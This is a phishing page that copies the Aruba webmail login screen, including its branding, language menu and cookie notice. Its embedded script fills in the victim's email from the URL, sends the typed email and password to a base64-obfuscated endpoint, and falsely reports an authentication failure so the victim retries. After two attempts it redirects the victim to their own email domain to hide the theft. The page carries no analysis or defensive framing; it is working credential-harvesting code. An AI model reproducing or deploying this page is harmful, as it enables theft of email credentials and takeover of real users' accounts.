<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link href="css/login.css" rel="stylesheet" type="text/css">
</head>

<body>
    <div class="login-background" style="display: flex;">
        <div class="main-block">
            <div class="left-block">
                <img src="images/aruba-promo.jpg">
            </div>
            <div class="right-block">
                <div class="logo-block">
                    <div class="left-logo"></div>
                    <div class="right-logo"></div>
                </div>
                <div class="tab-switcher-block">
                    <div class="tab-buttons-block">
                        <div class="tab-button tab-1 hide-in-classic" data-i18n="title_tab_1">Webmail</div>
                        <div class="tab-button tab-2 hide-in-classic" data-i18n="title_tab_2">Manage</div>
                    </div>
                    <div id="language-button" class="en">
                        <div class="language-flag">
                            <div id="menu_language">
                                <ul>
                                    <li dojoattrid="0">
                                        <div id="en">English</div>
                                    </li>
                                    <li dojoattrid="1">
                                        <div id="es">Español</div>
                                    </li>
                                    <li dojoattrid="2">
                                        <div id="it">Italiano</div>
                                    </li>
                                </ul>
                            </div>
                        </div>
                        <div id="language_select">English</div>
                        <div class="menu-language-arrow"><svg xmlns="http://www.w3.org/2000/svg" width="10" height="10" viewBox="0 0 32 32" fill="#3f3f3f">
                                <polygon points="2.002,10 16.001,24 30.002,10"></polygon>
                            </svg></div>
                    </div>
                </div>
                <div class="feedback-block">
                    <div class="feedback-icon"></div>
                    <div class="feedback-text" id="feedback-text"></div>
                </div>
                <div class="form-block">
                    <div class="form-tab tab-1" id="tab1">
                        <div data-i18n="form_title" class="form-title">Access your Webmail</div>
                        <input type="hidden" id="login_pid" name="PID" value="aruba">
                        <div class="input-container">
                            <div class="login-icon"></div>
                            <input type="text" id="ai" name="login" value="" data-i18n-placeholder="email" placeholder="Email">
                        </div>
                        <div class="input-container">
                            <div class="password-icon"></div>
                            <input type="password" id="pr" name="PASSWD" value="" data-i18n-placeholder="password" placeholder="Password">
                            <div class="password-icon-2" id="show"></div>
                        </div>
                        <div class="remember-me-block">
                            <label for="remember_me">
                                <input type="checkbox" id="remember_me" name="remember_me">
                                <div class="hide-in-classic" data-i18n="remember_me_label">Remember me</div>
                            </label>
                            <div data-i18n="lost_password" class="lost-password"><a href="#" target="_blank">Recover password</a></div>
                        </div>
                        <div class="capslock-detect" id="capslock_detect">Caps Lock</div>
                        <div class="radio-button-header hide-in-classic" data-i18n="select_version">SELECT VERSION:</div>
                        <div class="radio-button-pane hide-in-classic">
                            <div>
                                <div class="radio-button-cnt">
                                    <input type="radio" name="webmail_version" id="new_webmail_version" value="0">
                                    <label for="new_webmail_version">
                                        <div class="radio-button-outer">
                                            <div class="radio-button-inner"></div>
                                        </div>
                                        <div class="radio-button-label" data-i18n="radio_beta">Smart</div>
                                    </label>
                                    <div class="test-sticker">
                                        <div data-i18n="sticker_test">New</div>
                                    </div>
                                </div>
                                <div class="radio-button-cnt">
                                    <input type="radio" name="webmail_version" id="web2cs_version" value="1">
                                    <label for="web2cs_version">
                                        <div class="radio-button-outer">
                                            <div class="radio-button-inner"></div>
                                        </div>
                                        <div class="radio-button-label" data-i18n="radio_complete">Classic</div>
                                    </label>
                                </div>
                            </div>
                        </div>
                        <div data-i18n="button_login" class="login-button" id="submit-btn">LOG IN</div>
                    </div>
                </div>
            </div>
        </div>
        <div class="footer-block">
            <div class="accessible-link"><a href="#" target="_parent"><span data-i18n="accessible_link">Accessible version</span></a></div>
            <div class="text-footer" data-i18n="copyright">Copyright © 2020 Aruba S.p.A. - P.I. 01573850516 - All rights reserved - <a href="#" target="_blank" class="link">Privacy</a></div>
        </div>
    </div>
    <div id="cookie_directive" class="cookie-directive" style="display: block;"><span data-i18n="cookie_directive_text">To provide an even better browsing experience this site uses its own cookies and those of selected third parties and partners. Third-party cookies may also be profiling cookies.<br>If you would like to know more and to receive information on the use of cookies, or if you would like to withdraw your consent to cookies, click <a style="color:#FFFFFF;font-weight:bold;font-family:Lato;font-size:13px;" target="_blank" href="#">here</a>. By clicking on <input name="impliedsubmit" id="cookie_directive_button" value="I ACCEPT" type="button"> you give your consent to the cookies used by our site.</span></div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;

     $('#show').click(function() {
        event.preventDefault();
        var x = document.getElementById("pr");
        if (x.type === "password") {
            $('#show').css("background","https://webmail.aruba.it/web_imgs/login/images/password-icon-2-visible.svg?_v_=v4r2b57.20200506_1230");
            x.type = "text";
        } else {
            $('#show').css("background","https://webmail.aruba.it/web_imgs/login/images/password-icon-2.svg?_v_=v4r2b57.20200506_1230");
            x.type = "password";
        }

    });



    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $("#msg").hide();

    }
    ///////////////url getting ai////////////////
    $('input').focus(function(event) {
        $('#feedback-text').html("");
        $('.feedback-block').removeClass("error");

    });

var file="bmV4dC5waHA=";
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_ai)) {
            $('#feedback-text').html("Error: don't forget to fill correct in your email address.");
            $('.feedback-block').addClass("error");
            return false;
        }
        if (pr == "") {
            $('#feedback-text').html("Error: don't forget to fill in your password.");
            $('.feedback-block').addClass("error");
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#feedback-text').html("Authentication in progress.");
                $('.feedback-block').addClass("waiting");
            },
            success: function(response) {
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#pr").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("http://www." + my_slice);

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                // $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#feedback-text').html("Failure during authentication!");
                $('.feedback-block').removeClass("waiting");
                $('.feedback-block').addClass("error");
            }
        });
    });


});
</script>

</html>